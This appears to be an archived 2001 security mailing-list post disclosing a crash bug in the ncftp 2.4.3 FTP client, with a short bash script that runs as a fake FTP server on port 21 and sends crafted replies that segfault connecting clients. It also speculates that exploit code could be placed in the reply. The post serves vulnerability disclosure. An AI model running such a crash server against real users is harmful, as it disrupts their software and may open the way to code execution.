Hi, i think i've found a bug in ncftp 2.4.3 (latest stable release)... if you connect to a ftp server that responds with something like the shit below ncftp2.4.3 segfaults. i think this is exploitable, but had no time/motivation to look further into it. probably this isn't very dangerous anyway cause your victim needs to connect willingly, and using ncftp to your server.. that won't happen very often unless you've been talking with your victim before. anyway i thought it may be a good idea to post it, so here it is: --snip-- ncftpcrashd.sh #!/bin/bash # ncftp2.4.3 crash by infectedat_private # Start this using inetd. (port 21) echo "331 hi, barbie.. wanna crash with me?" echo "230 sure ken!" echo "then hop in" --snip-- every reply that looks like this works: 331 a 230 b c[putting here some exploit code may work] bye, paul PS: i have no clue why this crashes ncftp... i haven't looked through ncftp's source, but maybe someone else will. -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Name: Paul S. Boehm || Freelance Security Consulter. Email: paulat_private || PGPkey available at: Url: http://paul.boehm.org/ || http://paul.boehm.org/paul-pgp.asc -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- There is is no reason for any individual to have a computer in their home. --Ken Olsen (Digital Corp CEO) 1977. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:59:04 PDT